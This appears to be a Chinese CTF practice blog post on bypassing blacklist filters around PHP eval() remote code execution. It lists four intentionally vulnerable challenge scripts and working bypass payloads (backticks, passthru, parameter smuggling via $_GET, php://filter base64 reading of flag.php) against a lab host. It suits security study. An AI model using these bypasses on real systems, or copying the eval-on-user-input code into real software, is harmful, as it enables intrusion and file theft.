RCE的另外一些绕过练习

目录

被过滤了flag怎么办

方法

结果

过滤了flag、php、system

方法一

结果

​编辑

方法二

[过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行](#过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行)

方法一

方法二

相对于上面一道题来说多过滤了一个括号

方法一


被过滤了flag怎么办

php 复制代码
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

方法

php 复制代码
?c=system('cat fla*');

结果

过滤了flag、php、system

php 复制代码
 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
} 

方法一

php 复制代码
?c=echo%20`cat%20fla*`;

结果

方法二

php 复制代码
?c=passthru('cat fla*');

过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行

php 复制代码
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
} 

方法一

php 复制代码
http://192.168.244.152:8080/web.php?c=passthru($_GET[A]);&A=cat%20flag.php

方法二

php 复制代码
http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php

相对于上面一道题来说多过滤了一个括号

php 复制代码
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
} 

方法一

php 复制代码
http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php
相关推荐
泰迪智能科技37 分钟前
案例分享|企微智能会话风控系统:为尚丰盈铝业筑牢沟通安全防线
安全·企业微信
lingggggaaaa2 小时前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE
redis·笔记·学习·算法·安全·网络安全·couchdb
MoloXuanhe3 小时前
[TryHackMe]Wordpress: CVE-2021-29447(wp漏洞利用-SSRF+WpGetShell)
运维·网络·安全·tryhackme·thm
wanhengidc3 小时前
网页版的云手机都有哪些优势?
运维·网络·安全·游戏·智能手机
czijin5 小时前
【论文阅读】Security of Language Models for Code: A Systematic Literature Review
论文阅读·人工智能·安全·语言模型·软件工程
2501_915921436 小时前
iOS混淆工具实战 在线教育直播类 App 的课程与互动安全防护
android·安全·ios·小程序·uni-app·iphone·webview
monster_风铃6 小时前
小补充: IPv6 安全RA
网络·安全·智能路由器
运维开发王义杰7 小时前
信息安全:代码质量双雄对决,SonarQube 与 Codacy,传统巨擘与云原生新贵的深度剖析
安全·云原生
2301_780789668 小时前
渗透测试与网络安全审计的关系
网络·数据库·安全·web安全·网络安全
恒拓高科WorkPlus9 小时前
安全聊天:为何内网 IM 系统成企业首选?
安全